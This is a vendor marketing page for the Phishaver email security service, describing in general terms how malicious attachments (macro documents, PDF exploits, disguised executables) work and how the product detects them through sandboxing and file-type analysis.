Threat Type

Attachment Malware: Beyond File-Type Blocklists

Malicious attachments have evolved past simple signature matching. Office documents with embedded macros, PDF exploits, and executables disguised as legitimate files all require behavioral sandbox analysis — not just file-type identification — to catch before delivery.

How malicious attachment attacks work

Common attack patterns

Office macro attacks: A Word document or Excel spreadsheet arrives as an "invoice" or "purchase order" — both common enough that employees open them without suspicion. The document prompts the user to enable macros to view the content. The macro executes a PowerShell command, downloads a payload, and establishes persistence. Modern Office versions block macros by default, but social engineering ("enable content to see the document") and older policy configurations mean this vector remains active.

PDF exploits: A malicious PDF exploits vulnerabilities in PDF reader software or embeds JavaScript that performs a drive-by download when the file is opened. The file type itself is trusted and passes blocklists.

Disguised executables: An executable disguised with a double extension (invoice.pdf.exe) or with a file icon matching the claimed type. Some rely on Unicode right-to-left override tricks to display a filename that appears to end in .pdf but the actual extension is .exe.

How Phishaver analyzes attachments

Sandbox detonation

Attachments are opened in an isolated environment. Observable behaviors — process spawning, network connections, registry modifications, file system writes — are recorded and scored for malicious patterns.

Macro analysis

Office documents are scanned for embedded macros, VBA code, external data connections, and DDE fields. Macros that attempt to spawn processes or make network connections are flagged as high-risk.

True file type detection

Magic byte analysis determines the actual file type independent of the declared extension. A file claiming to be a PDF but with an EXE header is flagged before any sandbox step.

Signature + behavioral combined

Known-bad signatures are checked first for speed. If no signature match, behavioral analysis runs. Both results contribute to the overall confidence score, with behavioral analysis weighted higher for novel samples.

Observable attachment threat indicators

  • Attachment true file type differs from declared extension
  • Office document contains enabled macros with process-spawning or network-connection behavior
  • Sandbox detonation observes outbound connection to an unrecognized external host
  • Sandbox observes registry write attempts consistent with persistence mechanisms
  • PDF contains JavaScript with eval() or suspicious download actions
  • Filename contains Unicode right-to-left override characters
  • Double extension pattern detected (.pdf.exe, .docx.bat)
Threat Type

Spear Phishing

Malicious attachments often arrive via highly targeted spear phishing emails.

 Threat Type

Business Email Compromise

BEC attacks sometimes use malicious invoice documents as their social engineering hook.

 Threat Type

URL Sandboxing

Attachments frequently contain embedded URLs as the actual payload delivery mechanism.

Block malicious attachments

Sandbox every attachment before it reaches the inbox.

Behavioral analysis catches what signature matching misses. Connect to M365 or Google Workspace in under 5 minutes.

Get protected Talk to our team